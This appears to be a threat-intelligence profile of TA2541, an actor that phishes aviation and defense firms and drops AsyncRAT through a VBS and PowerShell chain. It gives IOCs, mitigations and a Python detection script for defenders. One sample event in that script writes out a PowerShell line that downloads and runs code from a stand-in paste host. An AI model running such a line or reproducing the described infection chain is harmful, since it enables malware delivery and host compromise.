threat profile: active
type: APT
threat level: Medium
status: Active
origin: Unknown — assessed criminal or state-aligned
last updated: 2026-03-27

TA2541

linked campaigns / tags: MITRE G1018; Operation Layover (Cisco Talos); Proofpoint-tracked since 2017; Nigeria-linked (Cisco Talos assessment)

One of the most consistent and sector-specific APTs tracked by Proofpoint — active since at least 2017 with almost no change in tactics over eight years. TA2541 exclusively targets aviation, aerospace, transportation, defense, and manufacturing using only industry-specific lure themes (aircraft parts, fuel orders, charter requests, ambulatory flight information) rather than current events or news. Proofpoint assesses the actor as cybercriminal due to commodity malware use and high-volume spray campaigns, but Cisco Talos' Operation Layover investigation linked the infrastructure to Nigeria — and the sector focus and multi-year persistence of a narrowly defined target set suggests possible state-aligned intelligence collection objectives running alongside or behind the financial surface activity.

attributed origin: Unknown; Nigeria assessed (Cisco Talos, ~73% of passive DNS resolutions for the key C2 domain)
mitre id: G1018
first observed: 2017 (Proofpoint tracking start; no more precise date is published)
primary motivation: Criminal (Proofpoint assessment); espionage / intelligence collection not ruled out
primary targets: Aviation, Aerospace, Transportation, Defense, Manufacturing
campaign volume: hundreds to thousands of messages per campaign; rarely above 10,000
tracked by: Proofpoint, Cisco Talos, Microsoft, Mandiant, Morphisec
current preferred RAT: AsyncRAT; vjw0rm (as of the February 2022 Proofpoint report)
defining characteristic: 8+ years of near-identical sector-specific TTPs

Overview

TA2541 is documented as one of the most stable and sector-consistent threat actors in the landscape. Proofpoint has tracked it continuously since 2017, and in nearly eight years of observation the group's fundamental approach has not changed: send bulk phishing emails using aviation and transportation lure themes to targets in aviation, aerospace, transportation, defense, and manufacturing, and deliver a commodity RAT payload. Campaigns consistently use English-language lures referencing industry-specific operational details — aircraft parts quotes, fuel orders, charter flight requests, ambulatory flight arrangements — rather than news events, current affairs, or trending topics. This specificity suggests a deliberate design to reach industry insiders who would find such requests credible, rather than a broad population sweep.

Proofpoint formally published its comprehensive TA2541 profile in February 2022, but noted that multiple other research organizations — Cisco Talos, Morphisec, Microsoft, and Mandiant — had independently observed and published on the same activity cluster since 2019 without connecting it all to a single actor. The Cisco Talos Operation Layover investigation (September 2021) was one of the most significant pre-Proofpoint disclosures, covering a two-year AsyncRAT campaign against the aviation industry and building a geographic profile of the threat actor through passive DNS telemetry that pointed approximately 73% of observed IPs to Nigeria. Proofpoint confirmed Operation Layover's activity overlaps with TA2541.

The question of TA2541's ultimate objective remains unresolved. Proofpoint classifies it as a cybercriminal actor due to its commodity malware use and high-volume broad targeting. However, the eight-year focus on aviation, aerospace, defense, and manufacturing — sectors with significant intelligence value for a range of state actors — combined with the Nigerian geographic assessment creates an ambiguous picture. The group may be financially motivated operators selling access or data, it may be operating with some degree of state alignment, or the Nigerian infrastructure footprint may reflect operational security layering rather than true operator location. Proofpoint explicitly states it does not know the actor's "ultimate goals and objectives once it achieves initial compromise."

What is analytically striking about TA2541 is the operational stability. Most threat actors — particularly those operating across eight-plus years — significantly evolve their TTPs in response to public disclosure, law enforcement attention, or defensive improvement. TA2541 has made minimal adaptations: it pivoted from macro-laden Word attachments to cloud-hosted VBS files (a delivery evolution shared across the entire threat landscape), it briefly adopted COVID-19 themes in spring 2020 before reverting within weeks, and it began using Discord URLs as an additional CDN in late 2021. The core model — industry-specific lure, cloud-hosted VBS, PowerShell execution, WMI security product discovery, AsyncRAT installation — has remained functionally identical.

Target Profile

TA2541's targeting is the narrowest of any actor in this hub by sector — five closely related verticals with recurring victims across all of them. The group does not target specific roles or functions within organizations; campaigns reach employees across all levels as long as they are at organizations in the relevant sectors.

  • Aviation Industry: The primary and most consistent target sector. Airlines, air cargo carriers, aircraft maintenance and repair organizations, aircraft parts suppliers, and aviation support services are all targeted. Lures mimic industry procurement requests, maintenance queries, and charter booking inquiries — the operational language of day-to-day aviation business. The ambulatory flight lure (requesting information on transporting a medical patient on a stretcher) is an example of the operational specificity that makes these emails credible to aviation personnel.
  • Aerospace and Defense: Defense contractors, aerospace manufacturers, and component suppliers are recurring targets. The defense sector is especially sensitive to long-term access campaigns because of the intelligence value of technical specifications, procurement data, and supply chain information.
  • Transportation and Logistics: Surface transportation operators, maritime logistics, cargo tracking companies, and freight forwarders fall within the target scope. TA2541 lures reference yacht charters, cargo shipments, and fuel orders — content credible to logistics and freight personnel.
  • Manufacturing: Industrial manufacturers, particularly those supplying components to aviation or defense programs, are included in the target profile. Supply chain proximity to aviation and defense targets makes manufacturers a logical secondary target for access and intelligence collection.
  • Geographic Scope: Campaigns impact hundreds of organizations globally. Recurring target regions are North America, Europe, and the Middle East — all significant aviation and defense hubs. Campaign messages are nearly always in English, consistent with targeting Anglophone aviation industry organizations and their international counterparts.

Tactics, Techniques & Procedures

The following TTPs are as documented by Proofpoint (February 2022), Cisco Talos (Operation Layover, September 2021), and Microsoft (May 2021). The attack chain has remained consistent across the full tracking period, with the delivery mechanism as the primary variable.

mitre id | technique | description
T1566.001 / T1566.002 | Phishing: Spearphishing Attachment / Spearphishing Link | Bulk phishing emails sent to hundreds to thousands of targets per campaign using exclusively aviation, aerospace, and transportation lure themes: aircraft parts quote requests, fuel order inquiries, charter flight requests, ambulatory flight arrangements, yacht charter information, PPE cargo shipments (the brief COVID-era pivot only), and generic cargo/freight queries. Emails are nearly always in English. The group does not use current events, news items, or trending topics; lures reference day-to-day operational aviation content. It is rare for a campaign to exceed 10,000 messages.
T1204.001 / T1204.002 | User Execution: Malicious Link / Malicious File | Early campaigns (2017–2020) delivered macro-laden Microsoft Word attachments directly in emails. From approximately 2020–2021 the group pivoted to Google Drive URLs leading to obfuscated VBS files, a shift that moves the malicious payload off attachment scanners and onto trusted cloud infrastructure. Since late 2021, Discord URLs linking to compressed files (leading to AgentTesla or Imminent Monitor) have also been used. RAR attachments with embedded executables containing CDN URLs are observed less frequently as an alternative to cloud links.
T1059.001 / T1059.005 | Command and Scripting Interpreter: PowerShell / Visual Basic | Obfuscated VBS files hosted on Google Drive or OneDrive are the primary payload stage. When executed, the VBS invokes PowerShell, which pulls a second-stage executable from a text file hosted on Pastetext, Sharetext, or GitHub and injects it into multiple Windows processes. VBS and PowerShell filenames mimic legitimate Windows system components (e.g., SystemFramework64Bits.vbs, RemoteFramework64.ps1) to blend with normal activity. AsyncRAT is then downloaded and installed as the final payload.
T1082 / T1518.001 | System Information Discovery / Software Discovery: Security Software Discovery | Before the RAT payload is downloaded, PowerShell queries Windows Management Instrumentation (WMI) for installed security products, including antivirus and firewall software. This discovery step lets the actor adapt payload delivery or attempt to disable specific products. Broader host information is then available to operators through the RAT once it is installed.
T1562.001 | Impair Defenses: Disable or Modify Tools | Following the WMI security product discovery, PowerShell attempts to disable built-in Windows security protections before the RAT payload is downloaded. The specific method varies by campaign and target environment, but the disablement step is consistent across the documented chain and reduces the likelihood that AsyncRAT or secondary RAT payloads trigger detection on installation.
T1547.001 / T1053.005 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder; Scheduled Task | AsyncRAT persistence is typically established by placing a VBS file in the Windows Startup directory that points to a PowerShell script. Registry AutoRun entries and scheduled task creation are also used, the latter documented in November 2021 Imminent Monitor campaigns and in vjw0rm/STRRAT campaigns. Persistence filenames mimic Windows system functionality to avoid attention during manual triage.
T1568 / T1583.001 | Dynamic Resolution; Acquire Infrastructure: Domains | TA2541 uses dynamic DNS (DDNS) for C2 rather than conventionally registered domains, enabling rapid rotation and sidestepping static blocklists. Consistent infrastructure patterns: C2 domains and payload staging URLs frequently contain the keywords "kimjoy," "h0pe," and "grace," and reply-to addresses in historic campaigns also contained "kimjoy." Consistent registrars/DDNS providers: Netdorm and No-IP. Consistent hosting providers: xTom GmbH and Danilenko, Artyom. Email sending infrastructure uses virtual private servers. These repeating patterns across years of campaigns are the core clustering evidence linking disparate campaigns to one actor.
T1102 / T1583.006 | Web Service; Acquire Infrastructure: Web Services | Google Drive is the primary payload hosting platform, with OneDrive used occasionally. Traffic to Google Drive is typically permitted by enterprise firewalls and is HTTPS-encrypted, so the malicious download is hard to distinguish from legitimate cloud storage access at the network layer. Discord CDN URLs have been used since late 2021 to deliver compressed archives containing AgentTesla or Imminent Monitor. Pastetext, Sharetext, and GitHub host the second-stage executable as a text file, again leveraging trusted platforms to evade network-layer detection.

Known Campaigns

TA2541 runs continuous campaigns rather than discrete high-profile operations. The key documented clusters are organized around delivery method evolution and the landmark research publications that unified previously disparate reporting.

Initial Macro-Attachment Phase — Aviation and Transport Phishing 2017–2020

TA2541's initial operational phase used macro-laden Microsoft Word attachments delivered directly in bulk phishing emails. The 2017–2020 malware roster cycled through PowerShell Empire, NetWire, WSH RAT, Parallax, LuminosityLink, njRAT, RevengeRAT, and others; across its tracked history the group has used over a dozen different malware payloads, with the roster changing roughly annually while the delivery mechanism and lure themes stayed the same. Malwarebytes and other researchers began observing some of this activity in 2019, but without connecting the campaigns to a unified actor. Lures throughout this phase used exclusively aviation, charter, cargo, and transportation vocabulary consistent with industry operational communications.

Operation Layover — AsyncRAT Aviation Campaign 2019–2021

Cisco Talos published Operation Layover in September 2021, documenting a two-year AsyncRAT campaign against the aviation industry. Cisco Talos used passive DNS telemetry to build a geographic profile of the threat actor, with approximately 73% of IPs associated with the key C2 domain (akconsult.linkpc.net) resolving to Nigerian addresses — the primary technical evidence supporting Nigeria as the operator's physical location. Operation Layover represented the most detailed pre-Proofpoint disclosure of TA2541's infrastructure and was confirmed by Proofpoint as overlapping with its TA2541 tracking cluster.

COVID-19 PPE / Cargo Theme Pivot Spring 2020

Like many threat actors in spring 2020, TA2541 briefly adopted COVID-19 lures — in its case, requests for quotes on personal protective equipment (PPE) cargo shipments and COVID-19 testing kit cargo. This represents the only documented instance of TA2541 adapting to an external news event in its entire tracked history. The pivot lasted only weeks before the group returned to its standard aviation and transport lures. The rapid reversion is notable: it suggests the operators had very low motivation to maintain COVID-19 framing and were either most comfortable with aviation-sector targeting or had specific operational reasons to remain within that vertical.

Microsoft Disclosure — RevengeRAT / AsyncRAT Campaign May 2021

Microsoft published research in May 2021 documenting a cyberespionage campaign against aviation targets delivering RevengeRAT or AsyncRAT. This campaign was later confirmed by Proofpoint to overlap with TA2541's activity cluster. Microsoft's reporting contributed to the multi-organization documentation that Proofpoint synthesized into the February 2022 comprehensive TA2541 profile — one of the clearest examples in recent years of independent research firms tracking the same actor without initially recognizing the common origin.

Google Drive VBS / Discord CDN Phase — AsyncRAT Primary 2021–Present

The current operational phase uses Google Drive URLs as the primary payload delivery mechanism, leading to obfuscated VBS files that chain through PowerShell and Pastetext/GitHub to download AsyncRAT. In late 2021, TA2541 added Discord URLs to the delivery mix, leading to compressed files that deliver AgentTesla or Imminent Monitor as alternative payloads. VBS file names reference aviation themes consistent with the overall lure strategy (e.g., "Aircrafts PN#_ALT PN#_Desc_&_Qty Details.vbs"). Proofpoint assessed with high confidence in 2022 that this TTP pattern would continue with minimal change, including continued use of cloud hosting for payloads, AsyncRAT, and vjw0rm.

Tools & Malware

TA2541 uses exclusively commodity and open-source malware — no custom tools. The RAT roster has cycled annually while the delivery mechanism and lure structure remained constant. AsyncRAT and vjw0rm are the current preference as of the Proofpoint 2022 report.

  • AsyncRAT (primary, current): An open-source C# remote access trojan widely used across the threat landscape. Provides remote system control, keylogging, file access, process management, and screen capture. AsyncRAT is TA2541's current preferred final payload, consistently dropped via the VBS/PowerShell chain since at least 2020. VBS persistence files in the Startup directory point to a PowerShell script that loads AsyncRAT on every boot.
  • vjw0rm: A JavaScript-based worm used as both a persistence mechanism and a RAT loader in documented TA2541 campaigns. Creates scheduled tasks and registry entries for persistence alongside AsyncRAT. Proofpoint specifically identified vjw0rm as one of two primary tools the group would continue using in future campaigns.
  • AgentTesla: An information stealer and RAT distributed via Discord CDN URLs. Primarily used for credential harvesting from browsers, email clients, and FTP applications. Delivered as a compressed file via Discord links.
  • Imminent Monitor: A commercial RAT used in TA2541 campaigns beginning approximately November 2021 — when Proofpoint observed both scheduled task and registry persistence methods being used for the first time. Delivered via Discord CDN compressed archives.
  • NetWire / WSH RAT / Parallax / RevengeRAT: Commercial and open-source RATs used in various TA2541 campaigns across the tracking period, alongside or in rotation with AsyncRAT. The group typically uses one or a handful of RATs per campaign, but over the course of 2020 it distributed more than 10 different RAT families, the broadest single-year malware diversity observed in the tracking period.
  • LuminosityLink / njRAT / STRRAT: Additional commodity RATs observed in TA2541 campaigns across 2017–2022. LuminosityLink is a discontinued but still widely distributed RAT; njRAT is a freely available Arabic-origin RAT popular across Middle East and African threat actor ecosystems. STRRAT is a Java-based RAT that uses scheduled task persistence alongside vjw0rm.
  • Crypters (payload obfuscation): MITRE ATT&CK G1018 notes that TA2541 uses crypters to obfuscate commodity RAT payloads, reducing static detection rates. The specific crypters vary by campaign. This obfuscation is applied on top of the VBS obfuscation layer already present in the delivery chain, creating a multi-layer evasion approach despite the relatively unsophisticated base tooling.

Indicators of Compromise

Infrastructure and file-based indicators from Proofpoint's February 2022 report and Cisco Talos' Operation Layover disclosure. The infrastructure indicators are particularly durable — the "kimjoy," "h0pe," and "grace" keyword pattern and the No-IP/Netdorm registrar preference have been consistent across years of campaigns.

ioc staleness warning

TA2541 uses dynamic DNS for C2, enabling rapid infrastructure rotation. Specific domain and IP IOCs from the 2022 Proofpoint report should be treated as high-staleness. Prioritize keyword pattern detection ("kimjoy," "h0pe," "grace" in DNS and URLs), registrar fingerprinting (No-IP DDNS, Netdorm), and behavioral indicators (Google Drive VBS download chain) over static domain or IP blocklisting. The full IOC list including VBS hashes and Emerging Threats signatures is available in the Proofpoint original report.

indicators of compromise — technical identifiers
c2 keyword pattern: "kimjoy" — appears in C2 domain names, reply-to addresses, and payload staging URLs across historic campaigns
c2 keyword pattern: "h0pe" — appears in C2 domains and payload staging URLs
c2 keyword pattern: "grace" — appears in C2 domains and payload staging URLs
domain registrars / DDNS providers: Netdorm; No-IP DDNS (linkpc.net, no-ip.biz, zapto.org subdomains) — consistent across campaigns
hosting providers: xTom GmbH; Danilenko, Artyom — recurring TA2541 infrastructure hosts
c2 domain (Operation Layover): akconsult.linkpc.net — key Operation Layover C2 domain; ~73% of resolving IPs located in Nigeria (Cisco Talos)
vbs hash (sha256): 67250d5e5cb42df505b278e53ae346e7573ba60a06c3daac7ec05f853100e61c — "Aircrafts PN#_ALT PN#_Desc_&_Qty Details.vbs" (Dec–Jan campaign)
persistence path: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\SystemFramework64Bits.vbs
powershell script path: %TEMP%\RemoteFramework64.ps1 (executed by the startup VBS)
payload hosting platforms: Google Drive; OneDrive; Discord CDN (cdn.discordapp.com); Pastetext; Sharetext; GitHub
email sending infra: virtual private servers (VPS), multiple providers; bulk email volume of hundreds to 10,000 messages per campaign
full ioc reference: Proofpoint report (Feb 2022), including C2 domains, VBS SHA256 hashes, and Emerging Threats signatures: proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight

Mitigation & Defense

Defensive guidance for organizations in TA2541's target verticals — aviation, aerospace, transportation, defense contractors, and manufacturing companies with supply chain ties to those sectors.

  • Aviation-Themed Email Filtering: TA2541's lures are themed to aviation, aircraft parts, fuel, charter, and cargo. Secure email gateways can weight external-sender messages that reference aircraft parts quotes, charter requests, fuel orders, or ambulatory flight arrangements more heavily when they also carry an attachment or a cloud-storage link. Because TA2541 does not chase trending news, this vocabulary has stayed narrow and consistent for years. The caveat: in an aviation organization the same vocabulary fills legitimate mail all day, so use these terms to raise the score of other signals (unknown sender, free-mail or generic reply-to, cloud link to a script file) rather than as a standalone block rule.
  • Block or Alert on Google Drive and Discord File Downloads in Client Context: The primary payload delivery mechanism is a Google Drive URL leading to a VBS file. Endpoint policies should block VBS file execution when downloaded from browser or email client contexts — applications that legitimately download VBS files from Google Drive are essentially nonexistent in enterprise aviation environments. Similarly, alert on Discord CDN (cdn.discordapp.com) file downloads from endpoints that are not developer or gaming systems.
  • DNS Keyword Monitoring — "kimjoy," "h0pe," "grace": The three C2 domain keyword patterns that have persisted across years of TA2541 infrastructure are high-fidelity detection signals. Configure DNS monitoring and SIEM alerts for queries or outbound connections to hostnames containing "kimjoy," "h0pe," or "grace." Treat one of these keywords combined with a No-IP or Netdorm dynamic DNS domain as a near-certain TA2541 indicator; on their own, "grace" and "h0pe" will also match legitimate names, so require the DDNS co-occurrence before auto-escalating. Alert on No-IP DDNS resolution (*.no-ip.biz, *.linkpc.net, *.zapto.org) generally, as TA2541 consistently uses these providers and few enterprise aviation endpoints have a business reason to resolve them.
  • PowerShell Execution from VBS / Office Process Trees: The TA2541 chain launches PowerShell from a VBS file. Monitor for powershell.exe spawned by wscript.exe or cscript.exe (and, for the older macro-based campaigns, by winword.exe). PowerShell in that position that sets an explicit -ExecutionPolicy argument and fetches content from Pastetext, Sharetext, or GitHub is a high-fidelity TA2541 detection pattern. As a general control, block or proxy-inspect PowerShell-initiated downloads from paste and text-sharing services, taking the current hostnames for those services from the Proofpoint IOC list rather than hard-coding guesses.
  • Startup Directory VBS Persistence Monitoring: AsyncRAT persistence adds VBS files to the Windows Startup directory with system-mimicking filenames. Monitor for new VBS file creation in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\ from non-administrative processes. Any VBS file added to this path by a browser, email client, or PowerShell process should trigger an immediate alert.
  • WMI Security Product Enumeration Alerting: TA2541's PowerShell stage queries WMI for security products before disabling them. WMI queries targeting the AntiVirusProduct or FirewallProduct classes from PowerShell in non-administrative context are a pre-disablement indicator. Log and alert on WMI calls to security product classes from unexpected process parents.
  • AsyncRAT C2 Port Monitoring: AsyncRAT's default configuration uses ports 6606, 7707, and 8808 for C2. Monitor for sustained outbound connections on these ports from endpoints, particularly from processes that have no reason to hold long-lived external connections. Operators can change these ports, so their absence proves nothing; when they do appear from aviation industry workstations, treat it as a high-priority incident.
  • Employee Awareness for Aviation-Specific Lures: TA2541's lures are operationally convincing for aviation personnel because they mimic routine business communications. Train procurement, operations, and logistics staff to verify unsolicited quote requests and charter inquiries through official channels before opening attachments or clicking links, particularly for requests arriving from unknown external senders at personal or generic email addresses rather than verified industry contacts.
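The detection guidance above and the keyword and path indicators in the IOC section lend themselves to a small rule set. The following is an added example written for this profile, not tooling from Proofpoint, Cisco Talos or MITRE. It applies five rules (DDNS domain containing a TA2541 keyword, wscript/cscript spawning PowerShell that fetches from a paste service, a VBS written into the Startup folder by a script or browser process, PowerShell querying the SecurityCenter2 WMI classes, and AsyncRAT default ports) to constructed endpoint and DNS events. The event schema and field names are assumptions loosely modelled on Sysmon; the sample hostnames, IPs and the pastetext.invalid URL are fictional.

```python
"""TA2541 detection rules over constructed telemetry (added example; not
Proofpoint/Talos/MITRE code). Event shape is an assumed Sysmon-like dict:
type, host, image, parent_image, command_line, target_path, query, dst_port."""

C2_KEYWORDS = ("kimjoy", "h0pe", "grace")            # durable C2 naming pattern
DDNS_SUFFIXES = (".no-ip.biz", ".linkpc.net", ".zapto.org")
STAGING_HOSTS = ("pastetext", "sharetext", "github")  # second-stage text hosting
STARTUP_DIR = "\\start menu\\programs\\startup\\"     # matched case-insensitively
SECURITY_CLASSES = ("antivirusproduct", "firewallproduct")  # root\SecurityCenter2
ASYNCRAT_DEFAULT_PORTS = {6606, 7707, 8808}
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
SUSPICIOUS_WRITERS = SCRIPT_HOSTS + ("powershell.exe", "outlook.exe",
                                     "chrome.exe", "msedge.exe", "firefox.exe")


def basename(path):
    """Lower-cased final path component; images are compared without directory."""
    return path.lower().rsplit("\\", 1)[-1]


def rule_dns(ev):
    q = ev.get("query", "").lower()
    ddns = q.endswith(DDNS_SUFFIXES)
    if ddns and any(k in q for k in C2_KEYWORDS):
        return "ta2541_ddns_keyword_c2"        # both signals present: near-certain
    if ddns:
        return "ddns_resolution"               # weaker signal, still worth logging
    return None


def rule_process(ev):
    if basename(ev.get("image", "")) != "powershell.exe":
        return None
    if basename(ev.get("parent_image", "")) not in SCRIPT_HOSTS:
        return None
    cmd = ev.get("command_line", "").lower()
    if any(h in cmd for h in STAGING_HOSTS):
        return "ta2541_vbs_powershell_staging_download"
    return "powershell_spawned_by_script_host"


def rule_file(ev):
    path = ev.get("target_path", "").lower()
    if (path.endswith(".vbs") and STARTUP_DIR in path
            and basename(ev.get("image", "")) in SUSPICIOUS_WRITERS):
        return "startup_vbs_persistence"
    return None


def rule_wmi(ev):
    q = ev.get("query", "").lower()
    if (basename(ev.get("image", "")) == "powershell.exe"
            and any(c in q for c in SECURITY_CLASSES)):
        return "security_product_enumeration"
    return None


def rule_network(ev):
    if ev.get("dst_port") in ASYNCRAT_DEFAULT_PORTS:
        return "asyncrat_default_port"   # defaults only; operators can change them
    return None


RULES = {"dns": rule_dns, "process": rule_process, "file": rule_file,
         "wmi": rule_wmi, "network": rule_network}


def run_rules(events):
    """Return one alert dict per event that trips a rule, in input order."""
    alerts = []
    for ev in events:
        rule = RULES.get(ev.get("type"), lambda _ev: None)(ev)
        if rule:
            alerts.append({"rule": rule, "host": ev.get("host"), "event": ev})
    return alerts


# Constructed sample telemetry (not real captures); hosts, IPs and URLs are fictional.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"type": "dns", "host": "ws-ops-12", "query": "drive.google.com"},
    {"type": "dns", "host": "ws-ops-12", "query": "kimjoy2022.no-ip.biz"},
    {"type": "dns", "host": "ws-fin-03", "query": "backup.zapto.org"},
    {"type": "process", "host": "ws-ops-12", "parent_image": r"C:\Windows\explorer.exe",
     "image": PS, "command_line": "powershell.exe -NoProfile"},
    {"type": "process", "host": "ws-ops-12", "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": PS, "command_line": "powershell -ExecutionPolicy RemoteSigned -w hidden -c "
     "\"IEX (New-Object Net.WebClient).DownloadString('https://pastetext.invalid/raw/x')\""},
    {"type": "file", "host": "ws-ops-12", "image": PS,
     "target_path": r"C:\Users\a\AppData\Roaming\Microsoft\Windows"
                    r"\Start Menu\Programs\Startup\SystemFramework64Bits.vbs"},
    {"type": "wmi", "host": "ws-ops-12", "image": PS, "query": "SELECT * FROM AntiVirusProduct"},
    {"type": "network", "host": "ws-ops-12", "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "dst_ip": "203.0.113.10", "dst_port": 6606},
    {"type": "network", "host": "ws-fin-03", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dst_ip": "198.51.100.7", "dst_port": 443},
]

if __name__ == "__main__":
    for a in run_rules(SAMPLE_EVENTS):
        print(f"{a['host']:10} {a['rule']}")
```

The DNS rule deliberately returns a weaker alert name for a bare DDNS resolution and the strong name only when a keyword and a DDNS suffix co-occur, which is the false-positive control the guidance above calls for. Map the field names to whatever your EDR or SIEM emits before deploying anything like this.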

analyst note

TA2541's eight-year operational persistence without significant TTP evolution is analytically unusual and warrants attention beyond its technical sophistication level. The simplest explanation is that the TTPs continue to work — targets in aviation and defense continue to open aviation-themed emails from unknown senders, execute VBS files downloaded from Google Drive, and the commodity RAT payloads establish persistence without triggering detection. The group's classification as "cybercriminal" by Proofpoint and "unskilled" by some researchers may underestimate the operational value of a persistent, low-noise long-term access campaign in aviation and defense organizations. A financially motivated actor optimizing for RAT deployment volume typically pivots to higher-return targets or techniques when ROI declines. TA2541's continued exclusive focus on the same five verticals for eight years — with a target set that includes defense contractors and aerospace manufacturers — suggests the access being generated has consistent downstream value, whether that value is realized through direct financial theft, access-as-a-service sales to third parties, or state-adjacent intelligence collection. Proofpoint's explicit acknowledgment that it does not know the actor's "ultimate goals and objectives once it achieves initial compromise" should be treated as an unresolved question with potential national security implications for defense-sector organizations that receive TA2541 campaigns.

Sources & Further Reading

  • Proofpoint, "Charting TA2541's Flight" (February 2022): proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight
  • Cisco Talos, Operation Layover (September 2021): two-year AsyncRAT aviation campaign and the passive DNS geographic profile cited above
  • MITRE ATT&CK group entry G1018 (TA2541)